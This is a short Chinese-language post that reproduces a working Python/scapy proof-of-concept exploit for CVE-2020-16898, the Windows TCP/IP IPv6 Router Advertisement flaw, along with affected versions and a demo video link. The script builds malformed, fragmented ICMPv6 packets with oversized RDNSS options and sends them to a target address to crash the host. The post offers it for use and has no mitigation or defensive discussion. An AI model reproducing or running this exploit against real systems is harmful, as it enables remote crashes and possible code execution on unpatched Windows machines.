CVE-2020-16898 | Windows TCP-IP远程执行代码漏洞 Exploit

# CVE-2020-16898 | Windows TCP/IP远程执行代码漏洞 Exploit

CVE-2020-16898 | Windows TCP/IP远程执行代码漏洞 Exploit

受影响的版本

Windows 10、Windows Server的多个版本均受影响。

利用视频：https://vimeo.com/467834951

exploit：

“`python
#!/usr/bin/env python3
#
# Proof-of-Concept / BSOD exploit for CVE-2020-16898 – Windows TCP/IP Remote Code Execution Vulnerability
#
# Author: Adam ‘pi3’ Zabrocki
# http://pi3.com.pl
#

from scapy.all import *

v6_dst = “fd12:db80:b052:0:7ca6:e06e:acc1:481b”
v6_src = “fe80::24f5:a2ff:fe30:8890″

p_test_half = ‘A’.encode()*8 + b”\x18\x30″ + b”\xFF\x18”
p_test = p_test_half + ‘A’.encode()*4

c = ICMPv6NDOptEFA();

e = ICMPv6NDOptRDNSS()
e.len = 21
e.dns = [
“AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA”,
“AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA”,
“AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA”,
“AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA”,
“AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA”,
“AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA”,
“AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA”,
“AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA”,
“AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA”,
“AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA” ]

pkt = ICMPv6ND_RA() / ICMPv6NDOptRDNSS(len=8) / \
Raw(load=’A’.encode()*16*2 + p_test_half + b”\x18\xa0″*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e

p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
IPv6ExtHdrFragment()/pkt

l=fragment6(p_test_frag, 200)

for p in l:
send(p)

“`